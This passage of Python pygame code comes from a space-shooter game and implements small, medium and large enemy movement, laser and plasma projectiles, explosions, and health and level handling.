enemy_small[enemy]['enemy_smallX_change'] = -enemy_small_xspeed\r\n enemy_small[enemy]['enemy_smallY_change'] = enemy_small_yspeed\r\n \r\n enemy_small[enemy]['cur_enemy_small_x'] += enemy_small[enemy]['enemy_smallX_change']*dt\r\n enemy_small[enemy]['cur_enemy_small_y'] += enemy_small[enemy]['enemy_smallY_change']*dt\r\n\r\n enemy_small[enemy]['rect'].x = enemy_small[enemy]['cur_enemy_small_x']\r\n enemy_small[enemy]['rect'].y = enemy_small[enemy]['cur_enemy_small_y']\r\n\r\n #Drawing enemy if alive else drawing explosion if destroyed and resetting the enemy properties\r\n if (enemy_small[enemy]['rect'].y < window_height+10) and enemy_small[enemy]['alive']:\r\n window.blit(enemy_small[enemy]['img'],\r\n (enemy_small[enemy]['cur_enemy_small_x'],\r\n enemy_small[enemy]['cur_enemy_small_y']))\r\n if lvl_value > 9 and 0 <= enemy_small[enemy]['rect'].y <= window_height/2-100:\r\n if powerups.pcollected == 'freeze':\r\n ch = 0\r\n else:\r\n ch = random.choices([0, 1], [19, 1], k=1)[0]\r\n #print(ch)\r\n if ch and not enemy_small[enemy]['laser_draw']:\r\n enemy_small[enemy]['laser_draw'] = True\r\n enemy_small[enemy]['laser_rect'].midtop = enemy_small[enemy]['rect'].center\r\n channels[0].play(enemy_small_laser_sound)\r\n \r\n elif (enemy_small[enemy]['rect'].y < window_height+10 and\r\n not enemy_small[enemy]['alive'] and\r\n enemy_small[enemy]['explosion_time'] > 0):\r\n if 0 <= enemy_small[enemy]['explosion_time'] < 15 or 30 <= enemy_small[enemy]['explosion_time'] < 45:\r\n window.blit(explosion_img[1],\r\n (enemy_small[enemy]['cur_enemy_small_x'],\r\n enemy_small[enemy]['cur_enemy_small_y']))\r\n elif 15 <= enemy_small[enemy]['explosion_time'] < 30 or 45 <= enemy_small[enemy]['explosion_time'] <= 60:\r\n window.blit(explosion_img[0],\r\n (enemy_small[enemy]['cur_enemy_small_x'],\r\n enemy_small[enemy]['cur_enemy_small_y']))\r\n enemy_small[enemy]['explosion_time'] -= 1\r\n elif (enemy_small[enemy]['rect'].y >= window_height+10):\r\n i = int(enemy[5:])\r\n enemy_small['enemy'+str(i)]['enemy_smallX_change'] = random.choice([enemy_small_xspeed, -enemy_small_xspeed])\r\n enemy_small['enemy'+str(i)]['enemy_smallY_change'] = enemy_small_yspeed\r\n enemy_small['enemy'+str(i)]['cur_enemy_small_x'] = random.randint(2, window_width-enemy_small_img_w-2)\r\n enemy_small['enemy'+str(i)]['cur_enemy_small_y'] = -300 #- (90 * (i-1))\r\n enemy_small['enemy'+str(i)]['rect'].x = enemy_small['enemy'+str(i)]['cur_enemy_small_x']\r\n enemy_small['enemy'+str(i)]['rect'].y = enemy_small['enemy'+str(i)]['cur_enemy_small_y']\r\n enemy_small['enemy'+str(i)]['alive'] = True\r\n enemy_small['enemy'+str(i)]['explosion_time'] = 60\r\n\r\n draw_enemy_small_laser(dt)\r\n\r\ndef draw_enemy_small_laser(dt=1):\r\n global enemy_small, enemy_small_laser_xspeed, enemy_small_laser_yspeed\r\n global enemy_small_laser, window_height\r\n\r\n del_list = []\r\n \r\n for enemy in enemy_small:\r\n\r\n if enemy_small[enemy]['laser_draw']:\r\n window.blit(enemy_small_laser, enemy_small[enemy]['laser_rect'])\r\n #print(enemy_small_laser_yspeed * dt)\r\n enemy_small[enemy]['laser_rect'].y += enemy_small_laser_yspeed * dt\r\n\r\n if enemy_small[enemy]['laser_rect'].bottom > window_height+50:\r\n del_list.append(enemy)\r\n #if enemy == 'enemy1':\r\n #print(enemy_small[enemy]['laser_rect'])\r\n\r\n for enemy in del_list:\r\n enemy_small[enemy]['laser_draw'] = False\r\n enemy_small[enemy]['laser_rect'].topleft = (0,0)\r\n \r\n\r\ndef draw_enemy_small_last(dt=1):\r\n global enemy_small_last, enemy_small_xspeed, enemy_small_yspeed\r\n global 
spawn_medium_enemy_trigger2, spawn_large_enemy_trigger2\r\n global enemy_small_laser_sound, channels\r\n\r\n del_list = []\r\n\r\n for enemy in enemy_small_last:\r\n if powerups.pcollected != 'freeze':\r\n if enemy_small_last[enemy]['rect'].x <= 2:\r\n enemy_small_last[enemy]['enemy_smallX_change'] = enemy_small_xspeed\r\n enemy_small_last[enemy]['enemy_smallY_change'] = enemy_small_yspeed\r\n elif enemy_small_last[enemy]['rect'].x >= window_width-enemy_small_img_w-2:\r\n enemy_small_last[enemy]['enemy_smallX_change'] = -enemy_small_xspeed\r\n enemy_small_last[enemy]['enemy_smallY_change'] = enemy_small_yspeed\r\n \r\n enemy_small_last[enemy]['cur_enemy_small_x'] += enemy_small_last[enemy]['enemy_smallX_change']*dt\r\n enemy_small_last[enemy]['cur_enemy_small_y'] += enemy_small_last[enemy]['enemy_smallY_change']*dt\r\n\r\n enemy_small_last[enemy]['rect'].x = enemy_small_last[enemy]['cur_enemy_small_x']\r\n enemy_small_last[enemy]['rect'].y = enemy_small_last[enemy]['cur_enemy_small_y']\r\n \r\n if (enemy_small_last[enemy]['rect'].y < window_height+10) and enemy_small_last[enemy]['alive']:\r\n window.blit(enemy_small_last[enemy]['img'],\r\n (enemy_small_last[enemy]['cur_enemy_small_x'],\r\n enemy_small_last[enemy]['cur_enemy_small_y']))\r\n if lvl_value > 9 and 0 <= enemy_small_last[enemy]['rect'].y <= window_height/2-100:\r\n if powerups.pcollected == 'freeze':\r\n ch = 0\r\n else:\r\n ch = random.choices([0, 1], [19, 1], k=1)[0]\r\n #print(ch)\r\n if ch and not enemy_small_last[enemy]['laser_draw']:\r\n enemy_small_last[enemy]['laser_draw'] = True\r\n enemy_small_last[enemy]['laser_rect'].midtop = enemy_small[enemy]['rect'].center\r\n channels[0].play(enemy_small_laser_sound)\r\n \r\n elif (enemy_small_last[enemy]['rect'].y < window_height+10 and\r\n not enemy_small_last[enemy]['alive'] and\r\n enemy_small_last[enemy]['explosion_time'] > 0):\r\n if 0 <= enemy_small_last[enemy]['explosion_time'] < 15 or 30 <= enemy_small_last[enemy]['explosion_time'] < 45:\r\n window.blit(explosion_img[1],\r\n (enemy_small_last[enemy]['cur_enemy_small_x'],\r\n enemy_small_last[enemy]['cur_enemy_small_y']))\r\n elif 15 <= enemy_small_last[enemy]['explosion_time'] < 30 or 45 <= enemy_small_last[enemy]['explosion_time'] < 60:\r\n window.blit(explosion_img[0],\r\n (enemy_small_last[enemy]['cur_enemy_small_x'],\r\n enemy_small_last[enemy]['cur_enemy_small_y']))\r\n enemy_small_last[enemy]['explosion_time'] -= 1\r\n elif (enemy_small_last[enemy]['rect'].y >= window_height+10):\r\n del_list.append(enemy)\r\n\r\n for enemy in del_list:\r\n del enemy_small_last[enemy]\r\n\r\n draw_enemy_small_laser(dt)\r\n\r\n if not enemy_small_last:\r\n pg.time.set_timer(enemy_medium.enemy_flash, 300)\r\n pg.time.set_timer(enemy_medium.laser_event, enemy_medium.laser_delay)\r\n\r\n pg.time.set_timer(enemy_large.enemy_flash, 300)\r\n pg.time.set_timer(enemy_large.laser_event, enemy_large.laser_delay)\r\n\r\n spawn_medium_enemy_trigger2 = True\r\n spawn_large_enemy_trigger2 = True\r\n\r\ndef init_enemy_small_last():\r\n global enemy_small, enemy_small_last\r\n\r\n for enemy in enemy_small:\r\n #if (0 <= enemy_small[enemy]['cur_enemy_small_x'] <= window_width and\r\n # -enemy_small[enemy]['rect'].height <= enemy_small[enemy]['cur_enemy_small_y'] <= window_height):\r\n if window_rect.colliderect(enemy_small[enemy]['rect']):\r\n enemy_small_last[enemy] = enemy_small[enemy]\r\n\r\n#Triggers/Flags to spawn medium enemy\r\nspawn_medium_enemy_trigger1 = False\r\nisinit_enemy_small_last = False\r\nspawn_medium_enemy_trigger2 = 
False\r\n\r\n\r\n#Medium enemy properties and functions\r\nclass EnemyMedium():\r\n def __init__(self):\r\n self.enemy_img = pg.image.load('.\\\\resources\\\\images\\\\enemy\\\\enemy-medium(180)160.png').convert_alpha()\r\n self.enemy_rect_pos = [(window_width*4/8, 200), (window_width*1/8, 200),\r\n (window_width*4/8, 200), (window_width*7/8, 200)]\r\n self.new_pos_acquired = False\r\n self.new_pos_set = False\r\n self.timer = False\r\n self.time_elapsed = 0\r\n self.pos_i = 0\r\n self.enemy_health = 20\r\n\r\n self.laser_img1 = pg.image.load('.\\\\resources\\\\images\\\\enemy\\\\minus(tilt1)9x24.png').convert_alpha()\r\n self.laser_img2 = pg.image.load('.\\\\resources\\\\images\\\\enemy\\\\minus(tilt2)9x24.png').convert_alpha()\r\n self.laser_yspeed = 0.5\r\n self.laser_xspeed = 0.5*(21/300)\r\n self.laser_n = 1\r\n self.lasers = {}\r\n self.laser_clock = pg.time.Clock()\r\n self.LL = 0\r\n self.UL = 3000\r\n self.DIFF = 6000\r\n self.set_laser_timer_lim = False\r\n self.laser_time = 0\r\n self.laser_delay = 1000\r\n self.laser_pause = 5000\r\n self.laser_event = pg.USEREVENT + 1\r\n self.laser_sound = mixer.Sound(r'.\\resources\\sounds\\laser3.wav')\r\n\r\n self.enemy_clock = pg.time.Clock()\r\n\r\n self.empty_img = pg.image.load('.\\\\resources\\\\images\\\\enemy\\\\empty160.png').convert_alpha()\r\n self.flash_surface = self.enemy_img\r\n self.enemy_flash = pg.USEREVENT + 2\r\n self.num_flash = 0\r\n\r\n self.set_params()\r\n\r\n def set_params(self):\r\n self.enemy_rect = self.enemy_img.get_rect()\r\n self.enemy_rect.center = (window_width/2, -200)\r\n self.enemyX = self.enemy_rect.x\r\n self.enemyY = self.enemy_rect.y\r\n self.enemy_xspeed = 0.5\r\n self.enemy_yspeed = 0.4\r\n self.enemy_xchange = 0\r\n self.enemy_ychange = 0\r\n self.cur_enemy_x = self.enemy_rect.x\r\n self.cur_enemy_y = self.enemy_rect.y\r\n self.laser_sound.set_volume(0.8)\r\n\r\n pg.time.set_timer(self.enemy_flash, 300)\r\n pg.time.set_timer(self.laser_event, self.laser_delay)\r\n\r\n def resize(self):\r\n global spawn_medium_enemy_trigger2\r\n \r\n self.enemy_rect_pos = [(window_width*4/8, 200), (window_width*1/8, 200),\r\n (window_width*4/8, 200), (window_width*7/8, 200)]\r\n\r\n if spawn_medium_enemy_trigger2 == False:\r\n self.enemy_rect.center = (window_width/2, -200)\r\n self.cur_enemy_x = self.enemy_rect.x\r\n self.cur_enemy_y = self.enemy_rect.y\r\n \r\n\r\n def add_laser(self):\r\n global mute, channels\r\n \r\n if mute == False:\r\n channels[0].play(self.laser_sound)\r\n\r\n if self.laser_n > 7:\r\n #pg.time.set_timer(self.laser_event, self.laser_pause)\r\n self.laser_n = 1\r\n\r\n self.lasers['laser'+str(self.laser_n)] = {}\r\n self.lasers['laser'+str(self.laser_n)]['img1'] = self.laser_img1\r\n self.lasers['laser'+str(self.laser_n)]['img2'] = self.laser_img2\r\n self.lasers['laser'+str(self.laser_n)]['laserY_change'] = 0\r\n self.lasers['laser'+str(self.laser_n)]['laserX_change'] = 0\r\n self.lasers['laser'+str(self.laser_n)]['laser1rect'] = self.laser_img1.get_rect()\r\n self.lasers['laser'+str(self.laser_n)]['laser2rect'] = self.laser_img2.get_rect()\r\n self.lasers['laser'+str(self.laser_n)]['laser1rect'].midtop = (self.enemy_rect.midbottom[0]-28, self.enemy_rect.midbottom[1])\r\n self.lasers['laser'+str(self.laser_n)]['laser2rect'].midtop = (self.enemy_rect.midbottom[0]+27, self.enemy_rect.midbottom[1])\r\n self.lasers['laser'+str(self.laser_n)]['cur_laser1_y'] = self.lasers['laser'+str(self.laser_n)]['laser1rect'].y\r\n self.lasers['laser'+str(self.laser_n)]['cur_laser2_y'] = 
self.lasers['laser'+str(self.laser_n)]['laser2rect'].y\r\n self.lasers['laser'+str(self.laser_n)]['cur_laser1_x'] = self.lasers['laser'+str(self.laser_n)]['laser1rect'].x\r\n self.lasers['laser'+str(self.laser_n)]['cur_laser2_x'] = self.lasers['laser'+str(self.laser_n)]['laser2rect'].x\r\n self.lasers['laser'+str(self.laser_n)]['laser1draw'] = True\r\n self.lasers['laser'+str(self.laser_n)]['laser2draw'] = True\r\n #print(self.lasers['laser'+str(self.laser_n)]['laser1rect'].midtop)\r\n #print(self.lasers['laser'+str(self.laser_n)]['laser2rect'].midtop)\r\n \r\n self.laser_n += 1\r\n\r\n def draw_laser(self, dt):\r\n global player_rect\r\n \r\n delete = []\r\n for laser in self.lasers:\r\n if (self.lasers[laser]['laser1rect'].top >= window_height+5 and\r\n self.lasers[laser]['laser2rect'].top >= window_height+5):\r\n delete.append(laser)\r\n continue\r\n\r\n self.lasers[laser]['laserY_change'] = self.laser_yspeed*dt\r\n self.lasers[laser]['laserX_change'] = self.laser_xspeed*dt\r\n\r\n if (self.lasers[laser]['laser1rect'].colliderect(player_rect) and\r\n self.lasers[laser]['laser1draw']):\r\n #self.lasers[laser]['laser1rect'].x = self.lasers[laser]['laser1rect'].y = -50\r\n self.lasers[laser]['laser1draw'] = False\r\n #print('hit')\r\n if (self.lasers[laser]['laser2rect'].colliderect(player_rect) and\r\n self.lasers[laser]['laser2draw']):\r\n #self.lasers[laser]['laser2rect'].x = self.lasers[laser]['laser2rect'].y = -50\r\n self.lasers[laser]['laser2draw'] = False\r\n #print('hit')\r\n \r\n self.lasers[laser]['cur_laser1_y'] += self.lasers[laser]['laserY_change']\r\n self.lasers[laser]['cur_laser2_y'] += self.lasers[laser]['laserY_change']\r\n self.lasers[laser]['laser1rect'].y = self.lasers[laser]['cur_laser1_y']\r\n self.lasers[laser]['laser2rect'].y = self.lasers[laser]['cur_laser2_y']\r\n self.lasers[laser]['cur_laser1_x'] -= self.lasers[laser]['laserX_change']\r\n self.lasers[laser]['cur_laser2_x'] += self.lasers[laser]['laserX_change']\r\n self.lasers[laser]['laser1rect'].x = self.lasers[laser]['cur_laser1_x']\r\n self.lasers[laser]['laser2rect'].x = self.lasers[laser]['cur_laser2_x']\r\n \r\n L1x = self.lasers[laser]['cur_laser1_x']\r\n L1y = self.lasers[laser]['cur_laser1_y']\r\n L2x = self.lasers[laser]['cur_laser2_x']\r\n L2y = self.lasers[laser]['cur_laser2_y']\r\n\r\n #print(L1x, L1y)\r\n #print(L2x, L2y)\r\n\r\n if self.lasers[laser]['laser1draw']:\r\n window.blit(self.lasers[laser]['img1'], (L1x, L1y))\r\n if self.lasers[laser]['laser2draw']:\r\n window.blit(self.lasers[laser]['img2'], (L2x, L2y))\r\n\r\n #print(delete)\r\n for key in delete:\r\n del self.lasers[key]\r\n\r\n def draw_enemy(self, dt, event_list):\r\n global powerups\r\n\r\n #print(self.pos_i)\r\n new_enemy_pos = self.enemy_rect_pos[self.pos_i]\r\n #print(self.enemy_rect.center, new_enemy_pos)\r\n #pg.time.set_timer(self.laser_event, self.laser_delay)\r\n\r\n if not self.new_pos_set and self.enemy_health > 0:\r\n\r\n if (math.fabs(self.enemy_rect.centerx-new_enemy_pos[0]) > 5 or\r\n math.fabs(self.enemy_rect.centery-new_enemy_pos[1]) > 5):\r\n if self.enemy_rect.center[0] - new_enemy_pos[0] > 5:\r\n self.cur_enemy_x += -self.enemy_xspeed*dt\r\n elif self.enemy_rect.center[0] - new_enemy_pos[0] < -5:\r\n self.cur_enemy_x += self.enemy_xspeed*dt\r\n if self.enemy_rect.center[1] < 200:\r\n self.cur_enemy_y += self.enemy_yspeed*dt\r\n self.enemy_rect.x = self.cur_enemy_x\r\n self.enemy_rect.y = self.cur_enemy_y\r\n\r\n else:\r\n #self.laser_time = 0\r\n #pg.time.set_timer(self.laser_event, self.laser_delay)\r\n 
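\r\n            # Waypoint dwell: once the ship has settled on an entry of\r\n            # enemy_rect_pos, new_pos_set pins it there while time_elapsed\r\n            # accumulates dt further down; after roughly 3000 ms the index\r\n            # pos_i advances to the next waypoint, wrapping back to 0 at\r\n            # the end of the list.\r\n            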
#self.new_pos_acquired = True\r\n self.new_pos_set = True\r\n #self.timer = True\r\n self.time_elapsed = 0\r\n #self.enemy_clock.tick()\r\n\r\n elif self.new_pos_set and self.enemy_health > 0:\r\n self.enemy_rect.centerx, self.enemy_rect.centery = new_enemy_pos\r\n self.cur_enemy_x = self.enemy_rect.x\r\n self.cur_enemy_y = self.enemy_rect.y\r\n\r\n if self.enemy_health > 0:\r\n window.blit(self.enemy_img,\r\n (self.cur_enemy_x, self.cur_enemy_y))\r\n else:\r\n for event in event_list:\r\n if event.type == self.enemy_flash:\r\n self.flash_surface = self.enemy_img if self.flash_surface == self.empty_img else self.empty_img\r\n window.blit(self.flash_surface,\r\n (self.cur_enemy_x, self.cur_enemy_y))\r\n \r\n\r\n #if self.timer:\r\n if self.new_pos_set:\r\n self.time_elapsed += dt#self.enemy_clock.tick()\r\n\r\n if self.time_elapsed >= 3000:\r\n if self.pos_i == len(self.enemy_rect_pos)-1:\r\n self.pos_i = 0\r\n else:\r\n self.pos_i += 1\r\n \r\n self.new_pos_set = False\r\n #self.timer = False\r\n self.time_elapsed = 0\r\n\r\n '''\r\n self.laser_time += self.laser_clock.tick()\r\n \r\n if self.LL <= self.laser_time <= self.UL:\r\n #print(self.LL, self.laser_time, self.UL)\r\n self.add_laser()\r\n self.draw_laser(dt)\r\n self.set_laser_timer_lim = True\r\n #elif self.set_laser_timer_lim:\r\n # self.LL += self.DIFF\r\n # self.UL += self.DIFF\r\n # self.set_laser_timer_lim = False\r\n '''\r\n\r\n if self.enemy_health > 0 and powerups.pcollected != 'freeze':\r\n for event in event_list:\r\n if event.type == self.laser_event:\r\n self.add_laser()\r\n self.draw_laser(dt)\r\n\r\n self.check_health(event_list)\r\n\r\n def check_health(self, event_list):\r\n global score_value, spawn_medium_enemy_trigger1, spawn_large_enemy_trigger1\r\n global spawn_medium_enemy_trigger2, isinit_enemy_small_last, spawn_large_enemy_trigger2\r\n global enemy_small_killed\r\n\r\n if self.enemy_health <= 0:\r\n self.lasers.clear()\r\n \r\n if self.enemy_health <= 0:\r\n for event in event_list:\r\n if event.type == self.enemy_flash:\r\n self.num_flash += 1\r\n if self.num_flash >= 12:\r\n score_value += 10\r\n spawn_medium_enemy_trigger1 = False\r\n spawn_medium_enemy_trigger2 = False\r\n spawn_large_enemy_trigger1 = False\r\n spawn_large_enemy_trigger2 = False\r\n isinit_enemy_small_last = False\r\n self.__init__()\r\n init_enemy_small_pos()\r\n increase_lvl()\r\n pg.time.set_timer(self.enemy_flash, 0)\r\n pg.time.set_timer(self.laser_event, 0)\r\n enemy_small_killed = 0\r\n \r\nenemy_medium = EnemyMedium()\r\n\r\n\r\n#Large enemy properties and functions\r\nclass EnemyLarge():\r\n def __init__(self):\r\n self.enemy_img = pg.image.load('.\\\\resources\\\\images\\\\enemy\\\\enemy-large200.png').convert_alpha()\r\n #self.enemy_rect_pos = [(window_width*4/8, 200), (window_width*1/8, 200),\r\n # (window_width*4/8, 200), (window_width*7/8, 200)]\r\n #self.new_pos_acquired = False\r\n #self.new_pos_set = False\r\n #self.timer = False\r\n #self.time_elapsed = 0\r\n #self.pos_i = 0\r\n self.enemy_health = 40\r\n\r\n self.laser_img = pg.image.load('.\\\\resources\\\\images\\\\enemy\\\\minus(90)9x24.png').convert_alpha()\r\n self.laser_yspeed = 0.6\r\n self.laser_n = 1\r\n self.lasers = {}\r\n self.lasers_draw = False\r\n self.laser_delay = 300\r\n #self.laser_pause = 5000\r\n self.laser_event = pg.USEREVENT + 3\r\n self.laser_sound = mixer.Sound(r'.\\resources\\sounds\\laser3.wav')\r\n\r\n self.plasma_img = pg.image.load('.\\\\resources\\\\images\\\\enemy\\\\plasma-ball360(2).png').convert_alpha()\r\n self.plasma_yspeed = 
0.4\r\n self.plasma_xspeed = 0.1\r\n #self.laser_n = 1\r\n self.plasmas = {}\r\n self.plasmas_draw = True\r\n #self.laser_delay = 700\r\n #self.laser_pause = 5000\r\n #self.laser_event = pg.USEREVENT + 1\r\n self.plasma_sound = mixer.Sound(r'.\\resources\\sounds\\electrical-shock-zap-short.wav')\r\n\r\n self.enemy_clock = pg.time.Clock()\r\n\r\n self.empty_img = pg.image.load('.\\\\resources\\\\images\\\\enemy\\\\empty160.png')\r\n self.flash_surface = self.enemy_img\r\n self.enemy_flash = pg.USEREVENT + 4\r\n self.num_flash = 0\r\n\r\n self.enemy_angle = 0\r\n self.rotate_enemy_event = pg.USEREVENT + 5\r\n self.rotate_delay = 10000\r\n\r\n self.weapon = 'plasma'\r\n\r\n self.set_params()\r\n\r\n def set_params(self):\r\n self.enemy_rect = self.enemy_img.get_rect()\r\n self.enemy_rect.center = (window_width/2, -200)\r\n self.enemy_xspeed = 0#0.5\r\n self.enemy_yspeed = 0#0.3\r\n self.set_enemy_speed = True\r\n self.enemy_xchange = 0\r\n self.enemy_ychange = 0\r\n self.cur_enemy_x = self.enemy_rect.x\r\n self.cur_enemy_y = self.enemy_rect.y\r\n self.rot_enemy = self.enemy_img\r\n self.rot_enemy_rect = self.enemy_rect.copy()\r\n self.plasma_sound.set_volume(0.3)\r\n self.laser_sound.set_volume(0.8)\r\n\r\n pg.time.set_timer(self.enemy_flash, 300)\r\n pg.time.set_timer(self.laser_event, self.laser_delay)\r\n #pg.time.set_timer(self.rotate_enemy_event, self.rotate_delay)\r\n\r\n self.set_plasma()\r\n\r\n def resize(self):\r\n global spawn_large_enemy_trigger2\r\n\r\n if spawn_large_enemy_trigger2 == False:\r\n self.enemy_rect.center = (window_width/2, -200)\r\n \r\n def add_laser(self):\r\n global mute, channels\r\n \r\n if mute == False:\r\n channels[0].play(self.laser_sound)\r\n\r\n if self.laser_n > 7:\r\n #pg.time.set_timer(self.laser_event, self.laser_pause)\r\n self.laser_n = 1\r\n\r\n self.lasers['laser'+str(self.laser_n)] = {}\r\n self.lasers['laser'+str(self.laser_n)]['img'] = self.laser_img\r\n self.lasers['laser'+str(self.laser_n)]['laserY_change'] = 0\r\n self.lasers['laser'+str(self.laser_n)]['laser1rect'] = self.laser_img.get_rect()\r\n #self.lasers['laser'+str(self.laser_n)]['laser2rect'] = self.laser_img.get_rect()\r\n self.lasers['laser'+str(self.laser_n)]['laser1rect'].midtop = (self.enemy_rect.right-65, self.enemy_rect.bottom)\r\n #self.lasers['laser'+str(self.laser_n)]['laser2rect'].midtop = (self.enemy_rect.midbottom[0]+27, self.enemy_rect.midbottom[1])\r\n self.lasers['laser'+str(self.laser_n)]['cur_laser1_y'] = self.lasers['laser'+str(self.laser_n)]['laser1rect'].y\r\n #self.lasers['laser'+str(self.laser_n)]['cur_laser2_y'] = self.lasers['laser'+str(self.laser_n)]['laser2rect'].y\r\n self.lasers['laser'+str(self.laser_n)]['laser1draw'] = True\r\n #self.lasers['laser'+str(self.laser_n)]['laser2draw'] = True\r\n #print(self.lasers['laser'+str(self.laser_n)]['laser1rect'].midtop)\r\n #print(self.lasers['laser'+str(self.laser_n)]['laser2rect'].midtop)\r\n \r\n self.laser_n += 1\r\n\r\n def draw_laser(self, dt):\r\n global player_rect\r\n \r\n delete = []\r\n for laser in self.lasers:\r\n if self.lasers[laser]['laser1rect'].top >= window_height+5:\r\n delete.append(laser)\r\n continue\r\n\r\n self.lasers[laser]['laserY_change'] = self.laser_yspeed*dt\r\n\r\n if (self.lasers[laser]['laser1rect'].colliderect(player_rect) and\r\n self.lasers[laser]['laser1draw']):\r\n #self.lasers[laser]['laser1rect'].x = self.lasers[laser]['laser1rect'].y = -50\r\n self.lasers[laser]['laser1draw'] = False\r\n #print('hit')\r\n \r\n self.lasers[laser]['cur_laser1_y'] += 
self.lasers[laser]['laserY_change']\r\n self.lasers[laser]['laser1rect'].y = self.lasers[laser]['cur_laser1_y']\r\n L1x = self.lasers[laser]['laser1rect'].x\r\n L1y = self.lasers[laser]['cur_laser1_y']\r\n\r\n #print(L1x, L1y)\r\n #print(L2x, L2y)\r\n\r\n if self.lasers[laser]['laser1draw']:\r\n window.blit(self.lasers[laser]['img'], (L1x, L1y))\r\n\r\n #print(delete)\r\n for key in delete:\r\n del self.lasers[key]\r\n\r\n def set_plasma(self):\r\n self.plasmas = {\r\n 'plasma1' : {\r\n 'Xchange' : -self.plasma_xspeed*1.2,\r\n 'Ychange' : self.plasma_yspeed,\r\n 'rect' : self.plasma_img.get_rect(w=16, h=16, midtop=(self.enemy_rect.left+62, self.enemy_rect.bottom)),\r\n #'cur_x' : self.plasmas['plasma1']['rect'].x,\r\n #'cur_y' : self.plasmas['plasma1']['rect'].y,\r\n 'draw' : True,\r\n 'pixel_travel' : 0,\r\n 'scale' : 0.0444,\r\n 'angle' : 0},\r\n 'plasma2' : {\r\n 'Xchange' : -self.plasma_xspeed/2,\r\n 'Ychange' : self.plasma_yspeed,\r\n #'rect' : self.plasma_img.get_rect(w=16, h=16, center=(self.plasmas['plasma1']['rect'].centerx+25,\r\n # self.plasmas['plasma1']['rect'].centery)),\r\n #'cur_x' : self.plasmas['plasma1']['rect'].x,\r\n #'cur_y' : self.plasmas['plasma1']['rect'].y,\r\n 'draw' : True,\r\n 'pixel_travel' : 0,\r\n 'scale' : 0.0444,\r\n 'angle' : 0},\r\n 'plasma3' : {\r\n 'Xchange' : self.plasma_xspeed/2,\r\n 'Ychange' : self.plasma_yspeed,\r\n #'rect' : self.plasma_img.get_rect(w=16, h=16, center=(self.plasmas['plasma2']['rect'].centerx+25,\r\n # self.plasmas['plasma1']['rect'].centery)),\r\n #'cur_x' : self.plasmas['plasma1']['rect'].x,\r\n #'cur_y' : self.plasmas['plasma1']['rect'].y,\r\n 'draw' : True,\r\n 'pixel_travel' : 0,\r\n 'scale' : 0.0444,\r\n 'angle' : 0},\r\n 'plasma4' : {\r\n 'Xchange' : self.plasma_xspeed*1.2,\r\n 'Ychange' : self.plasma_yspeed,\r\n #'rect' : self.plasma_img.get_rect(w=16, h=16, center=(self.plasmas['plasma3']['rect'].centerx+25,\r\n # self.plasmas['plasma1']['rect'].centery)),\r\n #'cur_x' : self.plasmas['plasma1']['rect'].x,\r\n #'cur_y' : self.plasmas['plasma1']['rect'].y,\r\n 'draw' : True,\r\n 'pixel_travel' : 0,\r\n 'scale' : 0.0444,\r\n 'angle' : 0}\r\n }\r\n\r\n for plasma in self.plasmas:\r\n if plasma != 'plasma1':\r\n prev_plasma = 'plasma'+str(int(plasma[-1])-1)\r\n self.plasmas[plasma]['rect'] = self.plasma_img.get_rect(w=16, h=16,\r\n center=(self.plasmas[prev_plasma]['rect'].centerx+25,\r\n self.plasmas[prev_plasma]['rect'].centery))\r\n self.plasmas[plasma]['cur_x'] = self.plasmas[plasma]['rect'].x\r\n self.plasmas[plasma]['cur_y'] = self.plasmas[plasma]['rect'].y\r\n \r\n def draw_plasma(self, dt):\r\n global player_rect, mute, channels\r\n\r\n #if self.plasmas['plasma1']['rect'].midtop == (self.enemy_rect.left+62, self.enemy_rect.bottom):\r\n if self.plasmas['plasma1']['rect'].top == self.enemy_rect.bottom:\r\n if mute == False:\r\n channels[2].play(self.plasma_sound)\r\n \r\n for plasma in self.plasmas:\r\n if self.plasmas[plasma]['rect'].top >= window_height+10:\r\n self.set_plasma()\r\n #if mute == False:\r\n # self.plasma_sound.play()\r\n break\r\n\r\n #self.plasmas[plasma]['Xchange'] = self.plasma_xspeed*dt\r\n #self.plasmas[plasma]['Ychange'] = self.plasma_yspeed*dt\r\n\r\n self.plasmas[plasma]['cur_x'] += self.plasmas[plasma]['Xchange']*dt\r\n self.plasmas[plasma]['cur_y'] += self.plasmas[plasma]['Ychange']*dt\r\n\r\n self.plasmas[plasma]['rect'].w = self.plasma_img.get_width()*self.plasmas[plasma]['scale']\r\n self.plasmas[plasma]['rect'].h = self.plasma_img.get_height()*self.plasmas[plasma]['scale']\r\n 
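\r\n            # Grow-and-spin bookkeeping: the rect is resized to the current\r\n            # scale before being repositioned so collisions track the\r\n            # enlarged ball; the sprite itself is redrawn each frame further\r\n            # down with pg.transform.rotozoom at the same scale and angle.\r\n            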
self.plasmas[plasma]['rect'].x = self.plasmas[plasma]['cur_x']\r\n self.plasmas[plasma]['rect'].y = self.plasmas[plasma]['cur_y']\r\n\r\n if (self.plasmas[plasma]['rect'].colliderect(player_rect) and\r\n self.plasmas[plasma]['draw']):\r\n self.plasmas[plasma]['draw'] = False\r\n\r\n Px = self.plasmas[plasma]['cur_x']\r\n Py = self.plasmas[plasma]['cur_y']\r\n\r\n P_surface = pg.transform.rotozoom(self.plasma_img,\r\n self.plasmas[plasma]['angle'],\r\n self.plasmas[plasma]['scale'])\r\n \r\n if self.plasmas[plasma]['draw']:\r\n window.blit(P_surface, self.plasmas[plasma]['rect'])#(Px, Py)\r\n\r\n self.plasmas[plasma]['pixel_travel'] += self.plasmas[plasma]['cur_y']\r\n if self.plasmas[plasma]['pixel_travel'] >= 10:\r\n self.plasmas[plasma]['pixel_travel'] = 0\r\n if self.plasmas[plasma]['rect'].bottom <= window_height-200:\r\n self.plasmas[plasma]['scale'] += 0.0015\r\n\r\n self.plasmas[plasma]['angle'] += 8\r\n \r\n def draw_enemy(self, dt, event_list):\r\n global mute, powerups\r\n\r\n if self.enemy_rect.centery < 150 and powerups.pcollected != 'freeze':\r\n self.enemy_yspeed = 0.15\r\n self.enemy_xspeed = 0\r\n elif self.enemy_rect.centery >= 150 and powerups.pcollected != 'freeze':\r\n if self.set_enemy_speed:\r\n self.enemy_yspeed = 0\r\n self.enemy_xspeed = random.choice([0.5, -0.5])\r\n self.set_enemy_speed = False\r\n self.set_plasma()\r\n pg.time.set_timer(self.rotate_enemy_event, self.rotate_delay)\r\n\r\n if (self.enemy_health > 0 and\r\n self.weapon == 'laser' and\r\n self.enemy_angle == 0 and\r\n powerups.pcollected != 'freeze'):\r\n for event in event_list:\r\n if event.type == self.laser_event:\r\n self.add_laser()\r\n self.draw_laser(dt)\r\n\r\n if (self.enemy_health > 0 and\r\n self.weapon == 'plasma' and\r\n 